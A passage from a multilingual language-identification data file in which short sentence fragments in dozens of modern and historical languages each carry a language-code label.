piciorul și conștiința că era\", \"label\": \"ro\"},\n {\"text\": \"relación coas pretensións do demandante e que, nos\", \"label\": \"gl\"},\n {\"text\": \"med petdeset in sedemdeset\", \"label\": \"sl\"},\n {\"text\": \"Catalunya; el Consell Comarcal del Vallès Oriental\", \"label\": \"ca\"},\n {\"text\": \"kunnen worden.\", \"label\": \"nl\"},\n {\"text\": \"Witkin je ve většině ohledů zcela jiný.\", \"label\": \"cs\"},\n {\"text\": \"lernen, so zu agieren, dass sie positive oder auch\", \"label\": \"de\"},\n {\"text\": \"olurmuş...\", \"label\": \"tr\"},\n {\"text\": \"sarcasmo de Altman, desde as «peruas» que discutem\", \"label\": \"pt\"},\n {\"text\": \"خلاف فوجداری مقدمہ درج کرے۔\", \"label\": \"ur\"},\n {\"text\": \"Norddal kommune :\", \"label\": \"no\"},\n {\"text\": \"dem Windows-.-Zeitalter , soll in diesem Jahr\", \"label\": \"de\"},\n {\"text\": \"przeklętych ucieleśniają mit poety-cygana,\", \"label\": \"pl\"},\n {\"text\": \"We do not believe the suspect has ties to this\", \"label\": \"en\"},\n {\"text\": \"groziņu pīšanu.\", \"label\": \"lv\"},\n {\"text\": \"Senior Vice-President David M. Thomas möchte\", \"label\": \"de\"},\n {\"text\": \"neomylně vybral nějakou knihu a začetl se.\", \"label\": \"cs\"},\n {\"text\": \"Statt dessen darf beispielsweise der Browser des\", \"label\": \"de\"},\n {\"text\": \"outubro, alcançando R $ bilhões em .\", \"label\": \"pt\"},\n {\"text\": \"(Porte, ), as it does other disciplines\", \"label\": \"en\"},\n {\"text\": \"uskupení se mylně domnívaly, že podporu\", \"label\": \"cs\"},\n {\"text\": \"Übernahme von Next Ende an dem System herum , das\", \"label\": \"de\"},\n {\"text\": \"No podemos decir a la Hacienda que los alemanes\", \"label\": \"es\"},\n {\"text\": \"и рѣста еи братья\", \"label\": \"orv\"},\n {\"text\": \"الذي اتخذ قرارا بتجميد اعلان الدولة الفلسطينية\", \"label\": \"ar\"},\n {\"text\": \"uurides Rootsi sõjaarhiivist toodud . sajandi\", \"label\": \"et\"},\n {\"text\": \"selskapets penger til å pusse opp sin enebolig på\", \"label\": \"no\"},\n {\"text\": \"средней полосе и севернее в Ярославской,\", \"label\": \"ru\"},\n {\"text\": \"il-massa żejda fil-ġemgħat u superġemgħat ta'\", \"label\": \"mt\"},\n {\"text\": \"The Global Beauties on internetilehekülg, mida\", \"label\": \"et\"},\n {\"text\": \"이스라엘 인들은 하나님이 그 큰 팔을 펴 이집트 인들을 치는 것을 보고 하나님을 두려워하며\", \"label\": \"ko\"},\n {\"text\": \"Snad ještě dodejme jeden ekonomický argument.\", \"label\": \"cs\"},\n {\"text\": \"Spalio d. vykusiame pirmajame rinkimų ture\", \"label\": \"lt\"},\n {\"text\": \"und schlechter Journalismus ein gutes Geschäft .\", \"label\": \"de\"},\n {\"text\": \"Du sodiečiai sėdi ant potvynio apsemtų namų stogo.\", \"label\": \"lt\"},\n {\"text\": \"цей є автентичним.\", \"label\": \"uk\"},\n {\"text\": \"Și îndegrabă fu cu îngerul mulțime de șireaguri\", \"label\": \"ro\"},\n {\"text\": \"sobra personal cualificado.\", \"label\": \"es\"},\n {\"text\": \"Tako se u Njemačkoj dvije trećine liječnika služe\", \"label\": \"hr\"},\n {\"text\": \"Dual-Athlon-Chipsatz noch in diesem Jahr\", \"label\": \"de\"},\n {\"text\": \"यहां तक कि चीन के चीफ ऑफ जनरल स्टाफ भी भारत का\", \"label\": \"hi\"},\n {\"text\": \"Li forestier du mont avale\", \"label\": \"fro\"},\n {\"text\": \"Netzwerken für Privatanwender zu bewundern .\", \"label\": \"de\"},\n {\"text\": \"만해는 승적을 가진 중이 결혼할 수 없다는 불교의 계율을 시대에 맞지 않는 것으로 보았다\", \"label\": \"ko\"},\n {\"text\": \"balance and weight distribution but not really for\", \"label\": \"en\"},\n {\"text\": \"og så e # tente vi opp den om morgonen å sfyrte\", \"label\": \"nn\"},\n {\"text\": \"변화는 의심의 여지가 없는 것이지만 반면에 진화는 논쟁의 씨앗이다 .\", \"label\": \"ko\"},\n {\"text\": \"puteare fac aceastea.\", \"label\": \"ro\"},\n {\"text\": \"Waitt seine Führungsmannschaft nicht dem\", \"label\": \"de\"},\n {\"text\": \"juhtimisega, tulid sealt.\", \"label\": \"et\"},\n {\"text\": \"Veränderungen .\", \"label\": \"de\"},\n {\"text\": \"banda en el Bayer Leverkusen de la Bundesliga de\", \"label\": \"es\"},\n {\"text\": \"В туже зиму посла всеволодъ сн҃а своѥго ст҃ослава\", \"label\": \"orv\"},\n {\"text\": \"пославъ приведе я мастеры ѿ грекъ\", \"label\": \"orv\"},\n {\"text\": \"En un nou escenari difícil d'imaginar fa poques\", \"label\": \"ca\"},\n {\"text\": \"καὶ γὰρ τινὲς αὐτοὺς εὐεργεσίαι εἶχον ἐκ Κροίσου\", \"label\": \"grc\"},\n {\"text\": \"직접적인 관련이 있다 .\", \"label\": \"ko\"},\n {\"text\": \"가까운 듯하면서도 멀다 .\", \"label\": \"ko\"},\n {\"text\": \"Er bietet ein ähnliches Leistungsniveau und\", \"label\": \"de\"},\n {\"text\": \"民都洛水牛是獨居的,並不會以群族聚居。\", \"label\": \"zh-hant\"},\n {\"text\": \"την τρομοκρατία.\", \"label\": \"el\"},\n {\"text\": \"hurbiltzen diren neurrian.\", \"label\": \"eu\"},\n {\"text\": \"Ah dimenticavo, ma tutta sta caciara per fare un\", \"label\": \"it\"},\n {\"text\": \"На первом этапе (-) прошла так называемая\", \"label\": \"ru\"},\n {\"text\": \"of games are on the market.\", \"label\": \"en\"},\n {\"text\": \"находится Мост дружбы, соединяющий узбекский и\", \"label\": \"ru\"},\n {\"text\": \"lessié je voldroie que li saint fussent aporté\", \"label\": \"fro\"},\n {\"text\": \"Дошла очередь и до Гималаев.\", \"label\": \"ru\"},\n {\"text\": \"vzácným suknem táhly pouští, si jednou chtěl do\", \"label\": \"cs\"},\n {\"text\": \"E no terceiro tipo sitúa a familias (%), nos que a\", \"label\": \"gl\"},\n {\"text\": \"وجابت دوريات امريكية وعراقية شوارع المدينة، فيما\", \"label\": \"ar\"},\n {\"text\": \"Jeg har bodd her i år .\", \"label\": \"no\"},\n {\"text\": \"Pohrozil, že odbory zostří postoj, pokud se\", \"label\": \"cs\"},\n {\"text\": \"tinham conseguido.\", \"label\": \"pt\"},\n {\"text\": \"Nicht-Erkrankten einen Anfangsverdacht für einen\", \"label\": \"de\"},\n {\"text\": \"permanece em aberto.\", \"label\": \"pt\"},\n {\"text\": \"questi possono promettere rendimenti fino a un\", \"label\": \"it\"},\n {\"text\": \"Tema juurutatud kahevedurisüsteemita oleksid\", \"label\": \"et\"},\n {\"text\": \"Поведение внешне простой игрушки оказалось\", \"label\": \"ru\"},\n {\"text\": \"Bundesländern war vom Börsenverein des Deutschen\", \"label\": \"de\"},\n {\"text\": \"acció, 'a mesura que avanci l'estiu, amb l'augment\", \"label\": \"ca\"},\n {\"text\": \"Dove trovare queste risorse? Jay Naidoo, ministro\", \"label\": \"it\"},\n {\"text\": \"essas gordurinhas.\", \"label\": \"pt\"},\n {\"text\": \"Im zweiten Schritt sollen im übernächsten Jahr\", \"label\": \"de\"},\n {\"text\": \"allveelaeva pole enam vaja, kuna külm sõda on läbi\", \"label\": \"et\"},\n {\"text\": \"उपद्रवी दुकानों को लूटने के साथ ही उनमें आग लगा\", \"label\": \"hi\"},\n {\"text\": \"@user nella sfortuna sei fortunata ..\", \"label\": \"it\"},\n {\"text\": \"математических школ в виде грозовых туч.\", \"label\": \"ru\"},\n {\"text\": \"No cambiaremos nunca nuestra forma de jugar por un\", \"label\": \"es\"},\n {\"text\": \"dla tej klasy ani wymogów minimalnych, z wyjątkiem\", \"label\": \"pl\"},\n {\"text\": \"en todo el mundo, mientras que en España consiguió\", \"label\": \"es\"},\n {\"text\": \"политики считать надежное обеспечение военной\", \"label\": \"ru\"},\n {\"text\": \"gogoratzen du, genio alemana delakoaren\", \"label\": \"eu\"},\n {\"text\": \"Бычий глаз.\", \"label\": \"ru\"},\n {\"text\": \"Opeření se v pravidelných obdobích obnovuje\", \"label\": \"cs\"},\n {\"text\": \"I no és només la seva, es tracta d'una resposta\", \"label\": \"ca\"},\n {\"text\": \"오경을 가르쳤다 .\", \"label\": \"ko\"},\n {\"text\": \"Nach der so genannten Start-up-Periode vergibt die\", \"label\": \"de\"},\n {\"text\": \"Saulista huomasi jo lapsena , että hänellä on\", \"label\": \"fi\"},\n {\"text\": \"Министерство культуры сочло нецелесообразным, и\", \"label\": \"ru\"},\n {\"text\": \"znepřátelené tábory v Tádžikistánu předseda\", \"label\": \"cs\"},\n {\"text\": \"καὶ ἦν ὁ λαὸς προσδοκῶν τὸν Ζαχαρίαν καὶ ἐθαύμαζον\", \"label\": \"grc\"},\n {\"text\": \"Вечером, в продукте, этот же человек говорил о\", \"label\": \"ru\"},\n {\"text\": \"lugar á formación de xuizos máis complexos.\", \"label\": \"gl\"},\n {\"text\": \"cheaper, in the end?\", \"label\": \"en\"},\n {\"text\": \"الوزارة في شأن صفقات بيع الشركات العامة التي تم\", \"label\": \"ar\"},\n {\"text\": \"tärkeintä elämässäni .\", \"label\": \"fi\"},\n {\"text\": \"Виконання Мінських угод було заблоковано Росією та\", \"label\": \"uk\"},\n {\"text\": \"Aby szybko rozpoznać żołnierzy desantu, należy\", \"label\": \"pl\"},\n {\"text\": \"Bankengeschäfte liegen vorn , sagte Strothmann .\", \"label\": \"de\"},\n {\"text\": \"продолжение работы.\", \"label\": \"ru\"},\n {\"text\": \"Metro AG plant Online-Offensive\", \"label\": \"de\"},\n {\"text\": \"nu vor veni, și să vor osîndi, aceia nu pot porni\", \"label\": \"ro\"},\n {\"text\": \"Ich denke , es geht in Wirklichkeit darum , NT bei\", \"label\": \"de\"},\n {\"text\": \"de turism care încasează contravaloarea\", \"label\": \"ro\"},\n {\"text\": \"Aurkaria itotzea da helburua, baloia lapurtu eta\", \"label\": \"eu\"},\n {\"text\": \"com a centre de formació en Tecnologies de la\", \"label\": \"ca\"},\n {\"text\": \"oportet igitur quod omne agens in agendo intendat\", \"label\": \"la\"},\n {\"text\": \"Jerzego Andrzejewskiego, oparty na chińskich\", \"label\": \"pl\"},\n {\"text\": \"sau một vài câu chuyện xã giao không dính dáng tới\", \"label\": \"vi\"},\n {\"text\": \"что экономическому прорыву жесткий авторитарный\", \"label\": \"ru\"},\n {\"text\": \"DRAM-Preisen scheinen DSPs ein\", \"label\": \"de\"},\n {\"text\": \"Jos dajan nubbái: Mana!\", \"label\": \"sme\"},\n {\"text\": \"toți carii ascultară de el să răsipiră.\", \"label\": \"ro\"},\n {\"text\": \"odpowiedzialności, które w systemie własności\", \"label\": \"pl\"},\n {\"text\": \"Dvomesečno potovanje do Mollenda v Peruju je\", \"label\": \"sl\"},\n {\"text\": \"d'entre les agències internacionals.\", \"label\": \"ca\"},\n {\"text\": \"Fahrzeugzugangssysteme gefertigt und an viele\", \"label\": \"de\"},\n {\"text\": \"in an answer to the sharers' petition in Cuthbert\", \"label\": \"en\"},\n {\"text\": \"Europa-Domain per Verordnung zu regeln .\", \"label\": \"de\"},\n {\"text\": \"#Balotelli. Su ebay prezzi stracciati per Silvio\", \"label\": \"it\"},\n {\"text\": \"Ne na košickém trávníku, ale už včera v letadle se\", \"label\": \"cs\"},\n {\"text\": \"zaměstnanosti a investičních strategií.\", \"label\": \"cs\"},\n {\"text\": \"Tatínku, udělej den\", \"label\": \"cs\"},\n {\"text\": \"frecuencia con Mary.\", \"label\": \"es\"},\n {\"text\": \"Свеаборге.\", \"label\": \"ru\"},\n {\"text\": \"opatření slovenské strany o certifikaci nejvíce\", \"label\": \"cs\"},\n {\"text\": \"En todas me decían: 'Espera que hagamos un estudio\", \"label\": \"es\"},\n {\"text\": \"Die Demonstration sollte nach Darstellung der\", \"label\": \"de\"},\n {\"text\": \"Ci vorrà un assoluto rigore se dietro i disavanzi\", \"label\": \"it\"},\n {\"text\": \"Tatínku, víš, že Honzovi odešla maminka?\", \"label\": \"cs\"},\n {\"text\": \"Die Anzahl der Rechner wuchs um % auf und die\", \"label\": \"de\"},\n {\"text\": \"האמריקאית על אדמת סעודיה עלולה לסבך את ישראל, אין\", \"label\": \"he\"},\n {\"text\": \"Volán Egyesülés, a Közlekedési Főfelügyelet is.\", \"label\": \"hu\"},\n {\"text\": \"Schejbala, který stejnou hru s velkým úspěchem\", \"label\": \"cs\"},\n {\"text\": \"depends on the data type of the field.\", \"label\": \"en\"},\n {\"text\": \"Umsatzwarnung zu Wochenbeginn zeitweise auf ein\", \"label\": \"de\"},\n {\"text\": \"niin heti nukun .\", \"label\": \"fi\"},\n {\"text\": \"Mobilfunkunternehmen gegen die Anwendung der so\", \"label\": \"de\"},\n {\"text\": \"sapessi le intenzioni del governo Monti e dell'UE\", \"label\": \"it\"},\n {\"text\": \"Di chi è figlia Martine Aubry?\", \"label\": \"it\"},\n {\"text\": \"avec le reste du monde.\", \"label\": \"fr\"},\n {\"text\": \"Այդ մաքոքը ինքնին նոր չէ, աշխարհը արդեն մի քանի\", \"label\": \"hy\"},\n {\"text\": \"și în cazul destrămării cenaclului.\", \"label\": \"ro\"},\n {\"text\": \"befriedigen kann , und ohne die auftretenden\", \"label\": \"de\"},\n {\"text\": \"Κύκνον τ̓ ἐξεναρεῖν καὶ ἀπὸ κλυτὰ τεύχεα δῦσαι.\", \"label\": \"grc\"},\n {\"text\": \"færdiguddannede.\", \"label\": \"da\"},\n {\"text\": \"Schmidt war Sohn eines Rittergutsbesitzers.\", \"label\": \"de\"},\n {\"text\": \"и вдаша попадь ѡпрати\", \"label\": \"orv\"},\n {\"text\": \"cine nu știe învățătură”.\", \"label\": \"ro\"},\n {\"text\": \"détacha et cette dernière tenta de tuer le jeune\", \"label\": \"fr\"},\n {\"text\": \"Der har saka også ei lengre forhistorie.\", \"label\": \"nn\"},\n {\"text\": \"Pieprz roztłuc w moździerzu, dodać do pasty,\", \"label\": \"pl\"},\n {\"text\": \"Лежа за гребнем оврага, как за бруствером, Ушаков\", \"label\": \"ru\"},\n {\"text\": \"gesucht habe, vielen Dank nochmals!\", \"label\": \"de\"},\n {\"text\": \"инструментальных сталей, повышения\", \"label\": \"ru\"},\n {\"text\": \"im Halbfinale Patrick Smith und im Finale dann\", \"label\": \"de\"},\n {\"text\": \"البنوك التريث في منح تسهيلات جديدة لمنتجي حديد\", \"label\": \"ar\"},\n {\"text\": \"una bolsa ventral, la cual se encuentra debajo de\", \"label\": \"es\"},\n {\"text\": \"za SETimes.\", \"label\": \"sr\"},\n {\"text\": \"de Irak, a un piloto italiano que había violado el\", \"label\": \"es\"},\n {\"text\": \"Er könne sich nicht erklären , wie die Zeitung auf\", \"label\": \"de\"},\n {\"text\": \"Прохорова.\", \"label\": \"ru\"},\n {\"text\": \"la democrazia perde sulla tecnocrazia? #\", \"label\": \"it\"},\n {\"text\": \"entre ambas instituciones, confirmó al medio que\", \"label\": \"es\"},\n {\"text\": \"Austlandet, vart det funne om lag førti\", \"label\": \"nn\"},\n {\"text\": \"уровнями власти.\", \"label\": \"ru\"},\n {\"text\": \"Dá tedy primáři úplatek, a často ne malý.\", \"label\": \"cs\"},\n {\"text\": \"brillantes del acto, al llevar a cabo en el\", \"label\": \"es\"},\n {\"text\": \"eee druga zadeva je majhen priročen gre kamorkoli\", \"label\": \"sl\"},\n {\"text\": \"Das ATX-Board paßt in herkömmliche PC-ATX-Gehäuse\", \"label\": \"de\"},\n {\"text\": \"Za vodné bylo v prvním pololetí zaplaceno v ČR\", \"label\": \"cs\"},\n {\"text\": \"Даже на полсантиметра.\", \"label\": \"ru\"},\n {\"text\": \"com la del primer tinent d'alcalde en funcions,\", \"label\": \"ca\"},\n {\"text\": \"кількох оповідань в цілості — щось на зразок того\", \"label\": \"uk\"},\n {\"text\": \"sed ad divitias congregandas, vel superfluum\", \"label\": \"la\"},\n {\"text\": \"Norma Talmadge, spela mot Valentino i en version\", \"label\": \"sv\"},\n {\"text\": \"Dlatego chciał się jej oświadczyć w niezwykłym\", \"label\": \"pl\"},\n {\"text\": \"будут выступать на одинаковых снарядах.\", \"label\": \"ru\"},\n {\"text\": \"Orang-orang terbunuh di sana.\", \"label\": \"id\"},\n {\"text\": \"لدى رايت شقيق اسمه أوسكار, وهو يعمل كرسام للكتب\", \"label\": \"ar\"},\n {\"text\": \"Wirklichkeit verlagerten und kaum noch\", \"label\": \"de\"},\n {\"text\": \"как перемешивают костяшки перед игрой в домино, и\", \"label\": \"ru\"},\n {\"text\": \"В средине дня, когда солнце светило в нашу\", \"label\": \"ru\"},\n {\"text\": \"d'aventure aux rôles de jeune romantique avec une\", \"label\": \"fr\"},\n {\"text\": \"My teď hledáme organizace, jež by s námi chtěly\", \"label\": \"cs\"},\n {\"text\": \"Urteilsfähigkeit einbüßen , wenn ich eigene\", \"label\": \"de\"},\n {\"text\": \"sua appartenenza anche a voci diverse da quella in\", \"label\": \"it\"},\n {\"text\": \"Aufträge dieses Jahr verdoppeln werden .\", \"label\": \"de\"},\n {\"text\": \"M.E.: Miała szanse mnie odnaleźć, gdyby naprawdę\", \"label\": \"pl\"},\n {\"text\": \"secundum contactum virtutis, cum careat dimensiva\", \"label\": \"la\"},\n {\"text\": \"ezinbestekoa dela esan zuen.\", \"label\": \"eu\"},\n {\"text\": \"Anek hurbiltzeko eskatzen zion besaulkitik, eta\", \"label\": \"eu\"},\n {\"text\": \"perfectius alio videat, quamvis uterque videat\", \"label\": \"la\"},\n {\"text\": \"Die Strecke war anspruchsvoll und führte unter\", \"label\": \"de\"},\n {\"text\": \"саморазоблачительным уроком, западные СМИ не\", \"label\": \"ru\"},\n {\"text\": \"han representerer radikal islamisme .\", \"label\": \"no\"},\n {\"text\": \"Què s'hi respira pel que fa a la reforma del\", \"label\": \"ca\"},\n {\"text\": \"previsto para também ser desconstruido.\", \"label\": \"pt\"},\n {\"text\": \"Ὠκεανοῦ βαθυκόλποις ἄνθεά τ̓ αἰνυμένην, ῥόδα καὶ\", \"label\": \"grc\"},\n {\"text\": \"para jovens de a anos nos Cieps.\", \"label\": \"pt\"},\n {\"text\": \"संघर्ष को अंजाम तक पहुंचाने का ऐलान किया है ।\", \"label\": \"hi\"},\n {\"text\": \"objeví i u nás.\", \"label\": \"cs\"},\n {\"text\": \"kvitteringer.\", \"label\": \"da\"},\n {\"text\": \"This report is no exception.\", \"label\": \"en\"},\n {\"text\": \"Разлепват доносниците до избирателните списъци\", \"label\": \"bg\"},\n {\"text\": \"anderem ihre Bewegungsfreiheit in den USA\", \"label\": \"de\"},\n {\"text\": \"Ñu tegoon ca kaw gor ña ay njotti bopp yu kenn\", \"label\": \"wo\"},\n {\"text\": \"Struktur kann beispielsweise der Schwerpunkt mehr\", \"label\": \"de\"},\n {\"text\": \"% la velocidad permitida, la sanción es muy grave.\", \"label\": \"es\"},\n {\"text\": \"Teles-Einstieg in ADSL-Markt\", \"label\": \"de\"},\n {\"text\": \"ettekäändeks liiga suure osamaksu.\", \"label\": \"et\"},\n {\"text\": \"als Indiz für die geänderte Marktpolitik des\", \"label\": \"de\"},\n {\"text\": \"quod quidem aperte consequitur ponentes\", \"label\": \"la\"},\n {\"text\": \"de negociación para el próximo de junio.\", \"label\": \"es\"},\n {\"text\": \"Tyto důmyslné dekorace doznaly v poslední době\", \"label\": \"cs\"},\n {\"text\": \"največjega uspeha doslej.\", \"label\": \"sl\"},\n {\"text\": \"Paul Allen je jedan od suosnivača Interval\", \"label\": \"hr\"},\n {\"text\": \"Federal (Seac / DF) eo Sindicato das Empresas de\", \"label\": \"pt\"},\n {\"text\": \"Quartal mit . Mark gegenüber dem gleichen Quartal\", \"label\": \"de\"},\n {\"text\": \"otros clubes y del Barça B saldrán varios\", \"label\": \"es\"},\n {\"text\": \"Jaskula (Pol.) -\", \"label\": \"cs\"},\n {\"text\": \"umožnily říci, že je možné přejít k mnohem\", \"label\": \"cs\"},\n {\"text\": \"اعلن الجنرال تومي فرانكس قائد القوات الامريكية\", \"label\": \"ar\"},\n {\"text\": \"Telekom-Chef Ron Sommer und der Vorstandssprecher\", \"label\": \"de\"},\n {\"text\": \"My, jako průmyslový a finanční holding, můžeme\", \"label\": \"cs\"},\n {\"text\": \"voorlichting onder andere betrekking kan hebben:\", \"label\": \"nl\"},\n {\"text\": \"Hinrichtung geistig Behinderter applaudiert oder\", \"label\": \"de\"},\n {\"text\": \"wie beispielsweise Anzahl erzielte Klicks ,\", \"label\": \"de\"},\n {\"text\": \"Intel-PC-SDRAM-Spezifikation in der Version . (\", \"label\": \"de\"},\n {\"text\": \"plângere în termen de zile de la comunicarea\", \"label\": \"ro\"},\n {\"text\": \"и Испания ще изгубят втория си комисар в ЕК.\", \"label\": \"bg\"},\n {\"text\": \"इसके चलते इस आदिवासी जनजाति का क्षरण हो रहा है ।\", \"label\": \"hi\"},\n {\"text\": \"aunque se mostró contrario a establecer un\", \"label\": \"es\"},\n {\"text\": \"des letzten Jahres von auf Millionen Euro .\", \"label\": \"de\"},\n {\"text\": \"Ankara se također poziva da u cijelosti ratificira\", \"label\": \"hr\"},\n {\"text\": \"herunterlädt .\", \"label\": \"de\"},\n {\"text\": \"стрессовую ситуацию для организма, каковой\", \"label\": \"ru\"},\n {\"text\": \"Státního shromáždění (parlamentu).\", \"label\": \"cs\"},\n {\"text\": \"diskutieren , ob und wie dieser Dienst weiterhin\", \"label\": \"de\"},\n {\"text\": \"Verbindungen zu FPÖ-nahen Polizisten gepflegt und\", \"label\": \"de\"},\n {\"text\": \"Pražského volebního lídra ovšem nevybírá Miloš\", \"label\": \"cs\"},\n {\"text\": \"Nach einem Bericht der Washington Post bleibt das\", \"label\": \"de\"},\n {\"text\": \"للوضع آنذاك، لكني في قرارة نفسي كنت سعيداً لما\", \"label\": \"ar\"},\n {\"text\": \"не желаят запазването на статуквото.\", \"label\": \"bg\"},\n {\"text\": \"Offenburg gewesen .\", \"label\": \"de\"},\n {\"text\": \"ἐὰν ὑμῖν εἴπω οὐ μὴ πιστεύσητε\", \"label\": \"grc\"},\n {\"text\": \"all'odiato compagno di squadra Prost, il quale\", \"label\": \"it\"},\n {\"text\": \"historischen Gänselieselbrunnens.\", \"label\": \"de\"},\n {\"text\": \"למידע מלווייני הריגול האמריקאיים העוקבים אחר\", \"label\": \"he\"},\n {\"text\": \"οὐδὲν ἄρα διαφέρεις Ἀμάσιος τοῦ Ἠλείου, ὃν\", \"label\": \"grc\"},\n {\"text\": \"movementos migratorios.\", \"label\": \"gl\"},\n {\"text\": \"Handy und ein Spracherkennungsprogramm sämtliche\", \"label\": \"de\"},\n {\"text\": \"Kümne aasta jooksul on Eestisse ohjeldamatult\", \"label\": \"et\"},\n {\"text\": \"H.G. Bücknera.\", \"label\": \"pl\"},\n {\"text\": \"protiv krijumčarenja, ili pak traženju ukidanja\", \"label\": \"hr\"},\n {\"text\": \"Topware-Anteile mehrere Millionen Mark gefordert\", \"label\": \"de\"},\n {\"text\": \"Maar de mensen die nu over Van Dijk bij FC Twente\", \"label\": \"nl\"},\n {\"text\": \"poidan experimentar as percepcións do interesado,\", \"label\": \"gl\"},\n {\"text\": \"Miał przecież w kieszeni nóż.\", \"label\": \"pl\"},\n {\"text\": \"Avšak žádná z nich nepronikla za hranice přímé\", \"label\": \"cs\"},\n {\"text\": \"esim. helpottamalla luottoja muiden\", \"label\": \"fi\"},\n {\"text\": \"Podle předběžných výsledků zvítězila v\", \"label\": \"cs\"},\n {\"text\": \"Nicht nur das Web-Frontend , auch die\", \"label\": \"de\"},\n {\"text\": \"Regierungsinstitutionen oder Universitäten bei\", \"label\": \"de\"},\n {\"text\": \"Խուլեն Լոպետեգիին, պատճառաբանելով, որ վերջինս\", \"label\": \"hy\"},\n {\"text\": \"Афганистана, где в последние дни идут ожесточенные\", \"label\": \"ru\"},\n {\"text\": \"лѧхове же не идоша\", \"label\": \"orv\"},\n {\"text\": \"Mit Hilfe von IBMs Chip-Management-Systemen sollen\", \"label\": \"de\"},\n {\"text\": \", als Manager zu Telefonica zu wechseln .\", \"label\": \"de\"},\n {\"text\": \"którym zajmuje się człowiek, zmienia go i pozwala\", \"label\": \"pl\"},\n {\"text\": \"činí kyperských liber, to je asi USD.\", \"label\": \"cs\"},\n {\"text\": \"Studienplätze getauscht werden .\", \"label\": \"de\"},\n {\"text\": \"учёных, орнитологов признают вид.\", \"label\": \"ru\"},\n {\"text\": \"acordare a concediilor prevăzute de legislațiile\", \"label\": \"ro\"},\n {\"text\": \"at større innsats for fornybar, berekraftig energi\", \"label\": \"nn\"},\n {\"text\": \"Politiet veit ikkje kor mange personar som deltok\", \"label\": \"nn\"},\n {\"text\": \"offentligheten av unge , sinte menn som har\", \"label\": \"no\"},\n {\"text\": \"însuși în jurul lapunei, care încet DISPARE în\", \"label\": \"ro\"},\n {\"text\": \"O motivo da decisão é evitar uma sobrecarga ainda\", \"label\": \"pt\"},\n {\"text\": \"El Apostolado de la prensa contribuye en modo\", \"label\": \"es\"},\n {\"text\": \"Teltow ( Kreis Teltow-Fläming ) ist Schmitt einer\", \"label\": \"de\"},\n {\"text\": \"grozījumus un iesniegt tos Apvienoto Nāciju\", \"label\": \"lv\"},\n {\"text\": \"Gestalt einer deutschen Nationalmannschaft als\", \"label\": \"de\"},\n {\"text\": \"D überholt zu haben , konterte am heutigen Montag\", \"label\": \"de\"},\n {\"text\": \"Softwarehersteller Oracle hat im dritten Quartal\", \"label\": \"de\"},\n {\"text\": \"Během nich se ekonomické podmínky mohou radikálně\", \"label\": \"cs\"},\n {\"text\": \"Dziki kot w górach zeskakuje z kamienia.\", \"label\": \"pl\"},\n {\"text\": \"Ačkoliv ligový nováček prohrál, opět potvrdil, že\", \"label\": \"cs\"},\n {\"text\": \"des Tages , Portraits internationaler Stars sowie\", \"label\": \"de\"},\n {\"text\": \"Communicator bekannt wurde .\", \"label\": \"de\"},\n {\"text\": \"τῷ δ’ ἄρα καὶ αὐτῷ ἡ γυνή ἐπίτεξ ἐοῦσα πᾶσαν\", \"label\": \"grc\"},\n {\"text\": \"Triadú tenia, mentre redactava 'Dies de memòria',\", \"label\": \"ca\"},\n {\"text\": \"دسته‌جمعی در درخشندگی ماه سیم‌گون زمزمه ستاینده و\", \"label\": \"fa\"},\n {\"text\": \"Книгу, наполненную мелочной заботой об одежде,\", \"label\": \"ru\"},\n {\"text\": \"putares canem leporem persequi.\", \"label\": \"la\"},\n {\"text\": \"В дальнейшем эта яркость слегка померкла, но в\", \"label\": \"ru\"},\n {\"text\": \"offizielles Verfahren gegen die Telekom\", \"label\": \"de\"},\n {\"text\": \"podrían haber sido habitantes de la Península\", \"label\": \"es\"},\n {\"text\": \"Grundlage für dieses Verfahren sind spezielle\", \"label\": \"de\"},\n {\"text\": \"Rechtsausschuß vorgelegten Entwurf der Richtlinie\", \"label\": \"de\"},\n {\"text\": \"Im so genannten Portalgeschäft sei das Unternehmen\", \"label\": \"de\"},\n {\"text\": \"ⲏ ⲉⲓϣⲁⲛϥⲓ ⲛⲉⲓⲇⲱⲗⲟⲛ ⲉⲧϩⲙⲡⲉⲕⲏⲓ ⲙⲏ ⲉⲓⲛⲁϣϩⲱⲡ ⲟⲛ ⲙⲡⲣⲏ\", \"label\": \"cop\"},\n {\"text\": \"juego podían matar a cualquier herbívoro, pero\", \"label\": \"es\"},\n {\"text\": \"Nach Angaben von Axent nutzen Unternehmen aus der\", \"label\": \"de\"},\n {\"text\": \"hrdiny Havlovy Zahradní slavnosti (premiéra ) se\", \"label\": \"cs\"},\n {\"text\": \"Een zin van heb ik jou daar\", \"label\": \"nl\"},\n {\"text\": \"hat sein Hirn an der CeBIT-Kasse vergessen .\", \"label\": \"de\"},\n {\"text\": \"καὶ τοὺς ἐκπλαγέντας οὐκ ἔχειν ἔτι ἐλεγχομένους\", \"label\": \"grc\"},\n {\"text\": \"nachgewiesenen langfristigen Kosten , sowie den im\", \"label\": \"de\"},\n {\"text\": \"jučer nakon četiri dana putovanja u Helsinki.\", \"label\": \"hr\"},\n {\"text\": \"pašto paslaugos teikėjas gali susitarti su\", \"label\": \"lt\"},\n {\"text\": \"В результате, эти золотые кадры переходят из одной\", \"label\": \"ru\"},\n {\"text\": \"द फाइव-ईयर एंगेजमेंट में अभिनय किया जिसमें जैसन\", \"label\": \"hi\"},\n {\"text\": \"výpis o počtu akcií.\", \"label\": \"cs\"},\n {\"text\": \"Enfin, elles arrivent à un pavillon chinois\", \"label\": \"fr\"},\n {\"text\": \"Tentu saja, tren yang berhubungandengan\", \"label\": \"id\"},\n {\"text\": \"Arbeidarpartiet og SV har sikra seg fleirtal mot\", \"label\": \"nn\"},\n {\"text\": \"eles: 'Tudo isso está errado' , disse um\", \"label\": \"pt\"},\n {\"text\": \"The islands are in their own time zone, minutes\", \"label\": \"en\"},\n {\"text\": \"Auswahl debütierte er am .\", \"label\": \"de\"},\n {\"text\": \"Bu komisyonlar, arazilerini satın almak için\", \"label\": \"tr\"},\n {\"text\": \"Geschütze gegen Redmond aufgefahren .\", \"label\": \"de\"},\n {\"text\": \"Time scything the hours, but at the top, over the\", \"label\": \"en\"},\n {\"text\": \"Di musim semi , berharap mengadaptasi Tintin untuk\", \"label\": \"id\"},\n {\"text\": \"крупнейшей геополитической катастрофой XX века.\", \"label\": \"ru\"},\n {\"text\": \"Rajojen avaaminen ei suju ongelmitta .\", \"label\": \"fi\"},\n {\"text\": \"непроницаемым, как для СССР.\", \"label\": \"ru\"},\n {\"text\": \"Ma non mancano le polemiche.\", \"label\": \"it\"},\n {\"text\": \"Internet als Ort politischer Diskussion und auch\", \"label\": \"de\"},\n {\"text\": \"incomplets.\", \"label\": \"ca\"},\n {\"text\": 